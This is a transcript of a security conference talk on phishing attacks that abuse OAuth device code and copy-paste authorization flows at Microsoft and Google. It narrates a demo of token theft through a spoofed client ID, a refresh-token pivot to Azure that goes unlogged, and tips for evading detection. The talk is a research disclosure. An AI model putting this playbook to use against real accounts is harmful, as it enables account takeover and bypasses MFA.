 Hey guys, how's it going? How's everyone doing, huh? Ah! Oh, come on. That's like 6 p.m. cheering. This is 4 p.m. You guys are still caffeinated. One more time! All right, this is a new speaker, man. Gotta double up. So, the next presentation is new phishing attacks exploiting OAuth authorization flows. Pretty academic there, huh? And the speaker's name is Jenko Huang. And I give a big cheer. This is his first deaf kind of appearance. He's so mellow. I'm gonna do this so mellow. Come on board. All right, thank you. It's good to be in Vegas. Good to see you in person. So being a noob, take it a little bit easy on me. Just laugh in my general directions when I crack my jokes, okay? So, here we go. We're gonna talk about phishing, and the math is about OAuth as a protocol, which I think is pretty interesting in terms of exposing opportunities for abuse. So, a little bit about me. I'm currently on the threat research team at Netscope, and I've dabbled in some of these areas over the past few years. But you really don't care about me. Let's see what I have to say. Let's see if we can get some interesting things going. So, in about... I'm gonna give you a little bit of warning here. It tops out about 45 minutes. But to reward you for being here in person, I added some bonus material. So there's about 60 slides to get through in 45 minutes. So if I amp it up and talk at 1.1x speed, you better listen a little bit faster, right? Wake up. If you want to fall asleep, go to track two, man. All right, this is real stuff. Thank you. All right, let's recap the history of phishing in about one minute, right? I know you guys know that, or know of people who know that. In the 90s, we're basically talking about SMTP. Attackers are faking domains, SSL certs. And the goal is the primary credential username and password, right? Nothing new there. But then along the way, probably driven a bit by mobile, we get apps, and that changes the protocol for the fish. So now we start getting smishes over SMS. We've got chat protocols and so on. And then from a perspective of the parties involved, it's easier for the attacker to host things. Maybe it's free accounts. With the cloud, you get infrastructure. From the user side, it's harder to detect these because the domain might be obscured, the SSL cert, you know, the real estate on a phone, those types of issues. And then with the cloud, well, let me talk about the controls. The defensive side has a couple techniques, and this is important to know, whether you're defending or red teaming. There's a lot of link analysis, which includes domains and certs. The fishes start to get a little bit more involved. Now it could be attachments. They have scripting in them that follow a link. Send a reputation in terms of SMTP might be at play. And it's not only on the incoming fish, but once the user clicks, you might try to detect this. There might be some packet inspection, maybe looking at the content to see if form fields with user names or passwords are being passed. So this is what's happening. There's also controls. Assuming the credential is compromised, so MFA turns out to be a pretty effective way to mitigate that other than the fact that it's complicated and not everyone deploys it. Also IP lists and policies, maybe device policies, so that even if you have that credential, you can't use it unless you're on the right device or IP. So that's where we are, maybe five to ten years ago. And then what happens in 2012 is the popularity of Internet brings OAuth, at least 2.0 as a spec. And then it takes some years to get adopted, but it's pretty prevalent now. And what does that look like? Well, there's this interchange. But basically the goal is not to have applications get your username and password. You're going to, as a user, pretend you're the user, going to have a secure kind of interaction with an identity provider, like Google, like Microsoft. They're the ones who see your username and password, no one else, but at the end of authenticating and approving whatever the application wanted you to approve, they get a session token, an OAuth session token, which pretty much allows them to act on your behalf. And so as users, we've seen this many a time. You might be shopping, you get to check out, you want to get to PayPal, PayPal's an OAuth provider. You get diverted to their site, and maybe you even see the URL and the cert, and you're like, yeah, this is the real PayPal site. I feel good. Maybe your software validates that. You go ahead and maybe do two-factor authentication. It's all on the up and up. And then you get to, on the right side, finally what we call a consent screen. In terms of PayPal, it's pretty straightforward. Will you approve this transfer of funds to the original site? Well, we also see it in other contexts. So let's go to an administrator tool. All the cloud infrastructure providers, Google, they have a CLI. It also speaks OAuth. So some of you probably see that today. So I can log into GCloud as Joe Blogs, and it'll launch a browser. It'll direct me, the user, to Google to authenticate. And I'll go through the same process. In this case, there might be cash credentials. I pick them or I enter them from scratch. MFA, again, might be at play. And I get to a different consent screen. Do you want to allow these three privileges? You the user for that application, which is the CLI. Notice a few things that are confusing, though, right? OAuth, it's confusing. It's confusing for the user. First, you see the blue text. That's the application name. Google Cloud SDK. What the hell is that? Didn't I just type the CLI? Well, if you're a GCloud administrator, you know that's the same thing. You're a first-time user. Like, what is that? Application identity is really weak or early with OAuth. And that opens up opportunities for phishing, because usually you can just pick that name as a developer, and that's what shows up in the dialogue. So that's a little foreshadowing, right, as we get into the presentation. But if you go ahead and authenticate and approve as a user, you get back to the application. And in the background, it's able to get your OAuth session plugins that you just approved. And then it goes on its merry way, basically accessing the cloud environment that you approved, right? Okay. Not a problem so far, if you're with me. For the most part, the payments works. For the most part, this works. And what happened with the phishing evolution? At first, not much. We're talking five, 10 years ago. They just had a different kind of login to fake. So, hey, here's Office 365's login. I'm going to fake that. But then there's a little bit of sophistication because we have these APIs. So when you enter your credential, some of the phishing attacks would call an API to check that credential, real Microsoft, or Google, or whatever API. And based on the outcome, it might provide a better fish. If it's a valid credential, great. I validated it as a phishing, as an attacker. But I'm going to redirect you maybe to the real Microsoft login in this case, give you a little error message, maybe. Just say, oh, hey, thanks. It's sort of a stealthy way to make the fish appear more legitimate, right? Because the user's left not with a transient dialogue, which is maybe a fake domain, but they're a real dialogue. But you've validated the credential up front. And if it fails, you might not store it because it's garbage, or you might prompt the user to re-enter it. Great. Same controls. We're five years back. Not a lot's changed. So let's start getting into OAuth, right? So here's sort of where things become interesting. First of all, why do we even care about jumping into the protocol itself to look for opportunities to abuse? There's sort of two main reasons that I'll propose. One is the target is no longer the primary credential of the username and password. Why? Well, there's some problems with that. If MFA is implemented, that's not so useful. It's hard to break MFA. But if you get the session token, it's already been blessed. It's post-authentication. You can use it, and you'll never be presented with an MFA challenge. So in a way, it bypasses MFA. That's reason number one. Further, session tokens generally have this reputation of being temporary. And OAuth, it does have a time limit on what is called the access token. It's usually an hour, but they give you a refresh token at the same time, which allows you pretty much to indefinitely renew and refresh your access token. So for all you protocol designers out there, this is a yellow flag. When you take something that's temporary and you make it permanent, but you call it sort of temporary, it's a bad thing. So as a researcher or someone on the red team side, it's where you start salivating because there's an opportunity to abuse it. So I basically have a permanent credential that has bypassed MFA. The second big reason is almost by design, OAuth is connecting three parties that are probably distributed on different IP addresses or could be. Identity platforms somewhere on the Internet, the user somewhere, application could be there, could be different. And so there's nice REST APIs, which basically means there's opportunities for remote exploit to grab things like tokens. It's by design made to be remotely accessible. So these are two reasons why you want to actually form your attack to exploit or abuse soft spots in the protocol as opposed to the old way, which is just go after your username and password. So what happened with phishing? Probably a couple years ago, we first saw something called the illicit consent grants and it started to take advantage of parts of the protocol. Instead of faking just a fake website, I fake as an attacker the application. And what is that? It is a piece of code. It could be a website, could be a local native app, but it's an OAuth application, so I do have to register it somewhere in an identity system. But basically my goal is to trick the user into granting wider privileges. They're called scopes, wider privileges. So basically I'm going to create something like my Google Drive. And yes, I'm going to prompt the user to authorize, maybe rewrite access to everything in Google Drive. Maybe I slip in extra privileges like rewrite access to email or Google Cloud. And I want to trick the user into hitting allow. If they do, I've got them. I'll get the OAuth access tokens. I'll have bypassed MFA. I'm pretty much free to go. Okay, so that's a few years ago. And what does it look like to the user? They only see a difference in the consent dialogue. I have two different examples. Different examples. And the enumerated list might just be bigger and longer or more descriptive in terms of wider privileges than they expect. But let's get real. No user reads this type of stuff, right? It's hard enough to get people to look at the padlock in the browser and understand what that means. I do appreciate as a researcher that the second diagram has these steps one through 12. That's actually not my doing. I appreciate it. All the fields are explained. What's the thumbnail? What's the domain? As a user, I'm horrified. It's that complicated that you need 12 steps to explain your approval. And it just goes to show that the protocol is complicated for everyone. It's complicated for developers, complicated for users, because no one understands this. You're just going to click through it like a eula. That's what's going to happen. So at the end of the day, this was an evolution of phishing. The controls are pretty much the same. And you're starting to see the tax side get a little more creative. So now we come to sort of an interesting piece. Two years ago, OAuth was extended to add another flow or set of interactions to handle a special case really described as hey, we've got a limited input device like your smart TV. That's going to be the application. In you, the user, the resource that I want access to. You've got your Netflix streaming subscription. But we all know using that remote control is a pain in the butt. So for usability reasons, we're going to give you a different flow which looks like this. This is RFC reference. Folks from Google and even Pings in there, Microsoft. And for you, the user, it just gives you instructions. Go to your smartphone, go to your desktop where you have a real keyboard. It's really easy. Type it in. And here's a short code that you enter in addition to your username and password. Once you do that on a different device, your TV is going to magically get stuff, OAuth tokens. And it's going to connect and access Netflix. And you'll be all set up. So that's fantastic, right? It looks like that. But the problem is I have a saying on usability breeds or as the father of insecurity for both, right? Probably job security for some of us too, right? But the point is this is a flag. It's a flag for protocol designers, implementers, and researchers. So really underneath the hood, we're going to demonstrate this, but underneath the hood, let me just describe what happens and what's different from the mainstream OAuth flow we've come to know as users. So we have that smart TV. And step two, it goes to the identity provider and gets these two codes, user code and device code. The user code it gives to the user, which we saw in the screenshots. Device codes used to retrieve the OAuth tokens. So the ordering is a little bit different and there's a step up front that's different from the mainstream flow. And what's the difference? The app is totally in control of this process. The code to retrieve the tokens and pass through anything. It doesn't pass through the user. It comes straight from the identity provider. So without fully understanding this, this is a warning bell that there's some opportunities for abuse. So I'm going to switch to a demo. Let's see what that really means. Before doing that, I just want to do a shout out to a doctor in the story, Sinema, who has a great blog, O365 blog. If you care about Microsoft stuff, including OAuth, but AD Microsoft, he demonstrated about a year and a half and actually, no, it's about eight months ago, 10 months ago, this fish that I'm going to show you. So let's see if you guys can see that. Okay. It's not projecting here. So I may need to switch out of presentation mode. Give me a second here. Audio visual problems. This is why they don't let new people go very often, right? Jesus. No, really, I know stuff about security. I just can't operate PowerPoint. The hell. No, seriously. Who do they let in here? All right, we're good, right? I have pre-recorded a demo of this attack. All right, you guys can see that. Left side is a victim. It's going to be a browser. Right side is a terminal session of attacker. So on the left, let's just go through this attack, so they're entering credentials. They're just logging in in the morning to FA and to Outlook. Nothing special. Meanwhile, independently on the right side, attacker is going to fish this person. Ed at Feast Health is on the left side. I want to point out that the attacker has not created anything. No fake domain, no fake application, nothing. He's going to run a script. First thing the script is going to do is to use the REST API call to Azure, to Microsoft, and grab a user and device code. It's in the output. This is a real call, just dumping the output. It's going to use the user code to fish the user. And there's also a login URI that's in there. That is standard, doesn't change. It's a real Microsoft login for device code. Okay? So this demo script just sends out a fish email with a template, which we'll see pop into the browser on the left side. All right? Ed at Feast Health is going to get this Outlook email. I just want to pause here for about four seconds, okay? I worked hard at this template, okay? I'm not the greatest fisher. That's not my job. Maybe you know someone who's better, but look. All right, this is a product team email. Okay? Hey. I can also not operate a video. My skills are bad. Okay, let's go back. Come on. Come on. Pause. Pause. Okay. Spacebar works. Look, this is a freebie, right? Who doesn't want a freebie? One terabyte of extra space, 100 megabyte attachment size increase just for you, right? This is a Carnival Barker. It's a free discount right here. All you have to do is go to the real Microsoft login, enter this nice short code, and we'll automatically give you that in your account. You will love us. So what's happening? They enter the code, all right? Let's assume they follow the fish, all right? Let's just be aware of what the user sees on the left. Pick an account or enter your credential. We already logged into Outlook in the browser, so it's got a cache, but it could be an account. Then it says, are you trying to sign into Microsoft Office? Where did that come from? It's because I didn't explain what the attacker did. The attacker did not even create an app. It just reused an existing app ID. It's called a client ID. It reused Outlook's client ID. That's nice. So what shows up came from Microsoft's real app, their name. What's going to show up in logs from Microsoft Office? Then we're done. Pretty much. That's all the user sees. Not much different other than the code. So what's happening on the attacker side? They sent the fish and they moved to step two, which is queering, polling, looping, and just queering Azure and saying, hey, let me know when the user logs in. After they do, give me those OAuth tokens. So I just logged in and boom, all this long gibberish, if you can see it, is the OAuth tokens. First thing you see is up top is the scope, the permissions. Where did that come from? Well, it turns out that's optional. When I executed this as an attacker, I didn't even request permissions. I just said, in Microsoft's version, they give me the default and that's a crap load. It's a very technical term. A load of crap of permissions. Calendar, email, contacts, read, write. It's all there. You can see access token in there. Once you have access token and refresh token, you've got the keys to the kingdom. The resource I did specify is an attacker. It's a graph API in Microsoft, which gives me a fair amount of access. Definitely to office but more. And I'm going to, as an attacker, just prove that the access token is valid. First, I'm going to have to log in on the left into his Azure account. All right? And on the right, I had already used the access token. I see three users, David, Ed, and Sandra. On the left, I'll check in Azure AD as Ed. And of course, this was live. It's real data. The users are those three that I created in this environment. It doesn't stop there. I can access Ed's email. So three messages show up. The title is actually the fish that Ed received. And of course, if I pop back to Outlook on the left, it's exactly down to the date, right? It's all real data. So, so far, from this fish, I've gotten AD users, I've gotten Outlook, but there's more, right? So one of the things I can do, and this is really subtle, this is the pivot, the doors wide open to switch from graph API to almost any other resource. I'm going after Azure right now just because I know Azure will exist because that has AD in it. So the resource changed. I did a refresh token call and I said, give me another token, a different token for Azure management APIs. And Microsoft didn't put up a fight. It just gave it to me. All right? And with that, I can do things like enumerate with AD's permissions. It turns out AD in this case is a global admin in Azure, so I hit the gold mine. I can do everything, right? I've got a new access token. I've got the keys to a new kingdom and I'm going to use that right off and you'll see we'll let this play out. I've just enumerated every resource AD has access to in his subscription in Azure. And just to prove to ourselves, I'll go back to AD's view on the left and there's a subscription named Azure subscription one, which is exactly what I pulled with attacker script. If I go to all resources in that subscription, I'll pull up maybe a dozen or so and I've got things like disks and computes and SSH keys and storage accounts with data. There's one named SA JEH1 SA storage account on that container on that are some files, but basically no surprise. Once I've gotten a certain amount of scope and privilege with a token, I can do anything with it. Now, what I didn't pause at and I'll just explain as we're looking at the data and it's syncing up, it's I got a new scope with that as I switched as I pivoted to Azure I also didn't I requested a scope. It was a really low level scope. It was user profile information. What I got back was user impersonation, which in Microsoft's world means I can do everything the user can do within Azure and it's pretty common but you can just see how the door opened step back from it. This was a Microsoft office fish with a free space offer. I did successfully fish and get access to Outlook and some AD information. Then I pivoted and then I went to Azure and I've got everything the user can see and in this case I got the right user. So all told not only was I able to be stealthy, I had huge huge access with this pivot. So let's go back to our slide deck. So what do you think? Yeah. Well, thanks for that. I didn't really expect applause. I just wanted to touch base. I just wanted to see how many people in the crowd worked at Microsoft and see what response I would get and I know what you're thinking. Did someone really get paid to implement that version of OAuth? Yeah, apparently so. But I don't particularly blame Microsoft even though this is a pretty big exposure. OAuth is complicated and you'll see as we go you can't keep the stuff straight. I've been looking at it for months and it's complicated and it's complicated for users and developers. So let's just peek under the hood a little bit and appreciate that complexity. This is the handshake 1 through 6 or 7 of what happens with that device code flow. Ultimately, step 5 is authentication, right? And then the real magic happens in step 6 when they get the OAuth token. But the key to all of this working is step 2. The device or application has full control of generating these codes that allow it to has the user use one of the codes to authenticate, but then the other code, it grabs the token. It's pretty easy, right? If you want to authenticate this, there's no login to set up Netflix. It's just the app, the malicious app or device runs the show. And I didn't even need a Microsoft account as an attacker, by the way. This is about as stealthy as it gets and that the pivot happens right after. This is where I just switch from Outlook to Azure, right? Some is common to other providers and some are specific to Microsoft. Attacker, no server infrastructure, no website, no fake page. The login page is Microsoft's no fake app of any kind. I have a dumb little script that just pulls and grabs tokens on my time. No consent screen to the user. It did say, hey, you logged into office, but there was no... Do you want to give away the app? No, there was none of that. And worse, there was this default scope in play where I got a lot by default. So about logging, there is an event logged when the attacker grabs this OAuth token. It shows an IP address. So attacker will have to just obscure the IP address. You know what's not logged? The pivot. When I use the refresh token to go to Azure, it's not logged. And you can imagine that there's a bias that people who implement OAuth think, well, the refresh token, I mean, pretty much it's indefinite. You just have to do it every hour. Why would we log that and take up space? Because you're getting proverbially screwed. That's why you want as much information as possible, but that's not logged. And that's where a pivot is really what I mean by that. I could have directly gotten Azure access tokens from the get go. I could even done that as Microsoft Outlook. That's a little weird. I could have reused the Azure CLI and gotten direct access in step one, but then that would have been logged. If I'm really going after Azure, I should do it in step two because it won't get logged. And I thought under the day, this just makes it tough for the defenders. There are some controls that are probably in place. People may try to block these device URLs. They are unique if you look at the full path. The domain is not unique. They're very commonly used, but that's imperfect because you know what? There are real apps that use device code authentication. I mean, you might block smart TVs, but the Azure CLI can log in using device code. It can log in with browser, but it also supports device code. Detection is difficult because of limited logging and remediation is imperfect. On the good side, with Microsoft, you can revoke the refresh token for a user. So if you're remediating an incident, and you're on the defensive side, you can do that, but it only takes out the refresh token. The access token, this is in the documentation, says something like well, we don't do the access token, but it'll be here within the hour. Good luck. The heck. Other than all these issues, it's a pretty good secure system. It just shows that controls are lagging. It's a complex protocol. Now, there's a practical consideration from that hack side. These user and device codes, once you generate them, last for 15 minutes. So again, security by temporary expiration kind of way. You can just play the numbers game as an attacker, out of a million. People will still get it in their email inbox, and some will respond. You could go to SMS or chat, smish them. Much more interactive, people will probably respond better. You could also fall back and create some infrastructure. Instead of phishing with the device code, meaning I pre-generated it and started the clock ticking, I get your free discount code. You come, press a button, clock starts ticking, but it's like search ads. Once you're searching, you're ready to do something. So now you're ready to get that discount code, because I draw on you in trade-offs, but it certainly shows that practical considerations shouldn't be a barrier. I could even do an image version of a code, because browser email clients in general will not load images, but users often load them. That could come to my website as an attacker. I could generate the code then, show it to you, maybe get a better response. Okay. Let's talk about Google. They're big and no auth, plenty of apps. How's their device code authorization? Well, a lot of similar characteristics. I can spoof or impersonate a Google app. I don't have to build an app. I can do the Google Cloud SDK, where Google is different and it saves them, is they limit, they require you to supply a scope. They ask, you have to tell them what you're trying to get. Whereas Microsoft, they'll just give you by default a lot. And it's limited. There's like seven scopes. Three have to do with user information, like your email address. Two with Google Drive, but it's only data created by that. And then two are with YouTube. So it's a pretty tight set of permissions you can ask. But you can get back, in this case, the device and user code. I can fish a user, convince them to go enter the code. They'll go through authentication and end up finishing that flow. And what's similar is no consent. So I know what you're thinking now. It's pretty similar. And it might be hard to believe that Google would give up basic user information, name, email address, your picture without user consent. I mean, that doesn't happen like in the last 10 years. But it did happen. It's foot noted. In some cases, if you ask for other scopes, sensitive scopes, you'll get a consent screen. But you can see that it's very implementation dependent this warning, this consent screen dialogue for the user. And they both share this characteristic. Both vendors do not present it with device code authorization. So anyway, the flow keeps going. This is just a set of curl commands so you can actually see what's happening down low. I can actually grab and get the access token. I can use it. And in this case, I can get user information back. Okay? So in summary, this is on the red and green. Those are the main differences. Look, no consent screens in both for most of these flows that I'm showing. The difference, the big difference is Microsoft opens the door and gives you a lot of privileges. Google constrains you to type 7. The lateral movement is a huge difference. You can pivot from Microsoft from one set of APIs to another. No questions asked. And so far, that's extremely hard to do. That's just one flow. Oauth has like five. So let's go back to the main flow that we all know and love. Authorization code grant. Let me just show it's not as obvious as the device code impact, but it still shows the weaknesses in the protocol. So let's just show something that my kids would say is janky, dad. This is really janky if they understood this at all. So let's go back to the main flow. You don't have to understand all of it, but I want to point out something. When the app redirects the user to go authenticate and they finish, this authorization code has to get back to the app from the identity provider. And this is complicated because it's done through a redirect URI. And there's many cases. So if the app is public, sitting on a public domain, identity provider, you'll pass that to Google or Microsoft, and they will directly communicate with you the authorization code because it's a public app sitting on the internet. However, the app could be behind the firewall sitting on the user's machine, a net firewall. So the redirect URL can also reference a host that's like local host or the loopback address. And how does that get to the app? It goes back through this browser as a 302 redirect. This is where it gets janky because you're like, what the heck? There's like multiple protocols at play. One's a sort of proper 302 redirect or maybe some kind of web hook communication. Another one's a redirect through a user, but that could also be a mobile app. And then it goes through those funny URLs where you have a registered mobile app. Basically what this screams is there's opportunities for abuse because you can intercept that which gives you the keys to the kingdom. You could attack the browser as an example. Could be an extension, could be cross-site scripting and you might be able to get that authorization code. You can attack the registration on the device. You can attack the local host name lookup. These require endpoint access, sure, but clearly that's not prohibitive in this day and age. But that's not actually what I want to talk about. Highlighted red is yet another form of a redirect URI. OOB sounds were out of banned. It's a copy paste thing. What the heck does that mean? It means as an app developer I can request that the authorization code come back to me through the user prompt the user to copy and paste in their browser the code, show them the code prompt them to copy and paste into my prompt. Who the hell would do that? A CLI would do that. Why? A CLI, you could be SSHing into a remote environment with no browser, no graphics, and the only way you can get it an authorization code is to copy and paste it. And that's exactly what Google CLI does. And so who cares about this? Because it's an opening, a little opening to abuse because I can intercept that because the user is sitting there with a code in front of them and I can convince them to copy and paste it. So maybe I fall back and create a website and I drive them with a fish there. And this is a website to invite you, all of you important customers to our innovation group. It will be at DEF CON. You'll be able to talk to us, affect our product strategy. All you got to do is log in to prove you're a Google customer and you're going to get a code and just copy it into our website. Yeah, I have to convince you and I have to get by the domain issues of hosting this. But if I do that and you go through and log in and you are right, you see the very official authorization code and guess what? No one on earth understands what that code means anyway. Does anyone understand what that code is? No. And look at the message. It says copy and paste it. Good luck. You don't know that it's tied to your session tokens which gives you, which are the keys to the kingdom. So if I can convince con the user to do copy and paste into my something I control I win. I get the social tokens. So what's the point of this? This is not as sexy as the device code exploit. But it does show that a vendor Google chose to implement copy paste. Microsoft did not. It exposes them. And I would not bet against this being exploited. I just would not. What does Azure CLI do? They use device code flow. Google does not. They use this copy and paste. That's how they do their CLI in part. So I can of course take that token and go house and now I have requested full access to the cloud environment so I can literally enumerate everything there. Okay. So how are we doing on time? Oh, good. You guys have done a good job of listening fast or at least pretending to. So we have a couple more slides. So I wanted to pause. It's all well and good to see sort of examples. But I thought it might be more useful to think ahead about how we should research things like OAuth and protocols and maybe look ahead. Both from definitely a red hat perspective and maybe a blue hat. So when we're analyzing protocols we're at a much higher level and I think as you might think there's certain focuses you want to look at for soft spots. One is the handshake and protocol. I think there's two major cases that you want to be aware of. One is the sniffing type attacks where you're intercepting traffic, man in the middle. So yes, the bad guy, the attacker can get secrets and other things. But the problem is I think there's a heavy bias. I say that from reading the protocols. There's a heavy bias thinking all attacks come through that method. What about outright impersonation? What if I take the place of one of these three parties, the application user and the identity platform. The user's the victim, but I can take the place of the application wholesale. So I will get all traffic. I'll create some of the traffic. It's harder to pull off of course, but it's well worth it. And the problem is that people aren't thinking about that. The controls or defensive measures don't protect well against them. Obviously we're after secrets. We're after the tokens. But with OAuth it's not the tokens that presumes you have the authorization code or the device code. That's really what you're after. So you have to understand the protocol to know what really gives you the real secret. And at the end of the day not everything is in the spec. Things are optional. Things are left to the implementer as we've seen differences. So just testing, does the vendor implement the spec? Reveals a whole bunch of no they didn't. Or sometimes they added proprietary things. Microsoft proprietary added this old scope thing. What the heck is that? Well, that caused some trouble. Google and other browser vendors when you log into Google Gmail you can open up a tab type in a generic drive.google.com guess what? You're popped into your Google Drive. But you didn't have to reauthenticate or say that you're approving Chrome to get access to Google Drive. They did stuff underneath to make your experience easier. And that anytime someone goes off the rails it usually leads to errors or opportunities. Anytime you see optional or deprecated and there's plenty of those in the spec, big warning sign. Because one they're usually deprecated because they're insecure and it usually takes them like years to actually remove them. So you get this big window. And there's a bunch of concerns that are highlighted in RFCs and those are great places to start. So remote phishing as an example is mentioned in the base RFC. And the problems it shows are biased because some of the language says something like this. To protect against remote phishing of device code flows the identity provider platform, Google or Azure should tell the user in big bold letters remind them that a device is getting access to whatever you see you're being prompted for. But that already assumes that you have a valid device in the picture. If I'm controlling the device, if I'm the phisher, I can convince you that that's exactly what you should see. Of course you're going to see device language because half the language is wrong and confusing. You see Google's cloud SDK when should be something like a CLI. I can convince you of anything. No one even reads today. Really we got third grade education in the states of reading. This is not going to work, right? But that's what's in the SPAC and it just shows how bad of an assumption that is in terms of protecting some of these protocols. And then at the end of the day anything that's complex and is simplified is ripe for abuse. We definitely want to look where the puck is going in terms of protocol development. That gives hints. Quickly in terms of stack some of the research I think sitting in the middle of this is useful using a proxy with SSL decrypt. Some assumptions that you can prove some certs along the way. Outright sniffing has more limited views but with browser traffic you can also decrypt that because they'll dump their SSL keys if you want them. Source code, don't ignore that. From a research perspective Enchromium is out there. Open source which gives a lot of hints of what Google's doing in Chrome. Usually isn't needed but sometimes there's secrets that aren't really secrets because they're in a native app and you can reverse them and find out things like client secrets and other things. And so I'm going to jump ahead to this isn't where the puck is going this is a picture Aaron Porecki of Okta I think he's still at Okta, had a good blog but this picture represents OAuth that it is today. It's a maze. RFC specs that contribute and make up what we use ubiquitously. It's a mess, no one can understand this. Where's it going? Well in seven short little screen pictures this is Aaron's doing, not mine. Top left is where we were in 2012 four different flows along the way some of them had to be extended more securely with PKCE which is an extra secret until we get to the bottom right where Aaron believes in OAuth 2.1 we'll simplify and remove all those insecure flows so this just gives hints all the stuff that's removed are probably more ripe for abuse today but maybe in the next year we end up with a more simplified OAuth and you might think that wow that gives us hope no it doesn't because one of those is device flow and we've seen how bad that can be today and we believe PKCE will stand up we'll see how it gets implemented but if I control the app I can generate any secret so finally to conclude make sure I don't get kicked off and tossed out of here there are ongoing research areas and all I want to say is that OAuth is so complicated that this list gets pretty long and it's there today and we're just scratching the surface and I'll call out to everyone if you didn't catch it Matthew Bryant had some great stuff about app scripts in Google and there's some OAuth underneath and it just shows how OAuth can go in a whole different direction and help contribute to other vulnerabilities and lead to some pretty big abuse so in the interest of ending sort of on time that's it there's some open source to drive the demo that was in the video but at least makes it clear the whole interchange you can pick that up in the slides if you have follow-on questions there's a session I believe at five in the Gold Room next door feel free to approach me ask questions my contact information is there you can find me in a lot of the usual places and at the end of the day all I have to say about OAuth is the one big surprise is that I didn't think I'd say is that I never would have thought all the research I did on OAuth would lead me back to thinking a different security model of hard-coded clients IDs and secrets was a good idea are you listening Amazon AWS out there the AWS secret API keys that get uploaded to GitHub and Pacebin but by comparison I understand your exposure with that which is don't hard-code stuff put it on external scripts don't upload it to GitHub here you essentially got a permanent OAuth key that gets abused ultimately in the same way but the problem is no one understands this and I guarantee you in five minutes you're going to flush this from your brain because your head hurts my head hurts from spending a lot more time than you so that's part of the lesson here there's a lot of opportunities no matter who you are but no matter what this is an area that deserves a lot more research thank you